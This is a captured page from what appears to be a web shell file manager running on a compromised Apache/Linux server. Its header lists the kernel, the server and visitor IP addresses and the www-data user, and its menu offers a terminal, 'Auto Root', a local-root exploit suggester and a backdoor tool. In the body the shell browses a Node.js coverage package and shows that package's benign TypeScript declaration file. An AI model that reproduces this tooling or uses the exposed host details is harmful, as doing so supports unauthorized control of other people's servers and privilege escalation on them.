Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
v8-to-istanbul /
Delete
Unzip
Name
Size
Permission
Date
Action
lib
[ DIR ]
drwxr-xr-x
2024-07-09 21:58
index.d.ts
699
B
-rw-r--r--
2023-08-21 05:40
index.js
197
B
-rw-r--r--
2023-08-21 05:40
package.json
1.09
KB
-rw-r--r--
2023-08-21 05:40
pkgjs-lock.json
1.16
KB
-rw-r--r--
2023-08-21 05:40
Save
Rename
/// <reference types="node" /> import { Profiler } from 'inspector' import { CoverageMapData } from 'istanbul-lib-coverage' import { SourceMapInput } from '@jridgewell/trace-mapping' declare type Sources = | { source: string } | { source: string originalSource: string sourceMap: { sourcemap: SourceMapInput } } declare class V8ToIstanbul { load(): Promise<void> destroy(): void applyCoverage(blocks: ReadonlyArray<Profiler.FunctionCoverage>): void toIstanbul(): CoverageMapData } declare function v8ToIstanbul(scriptPath: string, wrapperLength?: number, sources?: Sources, excludePath?: (path: string) => boolean): V8ToIstanbul export = v8ToIstanbul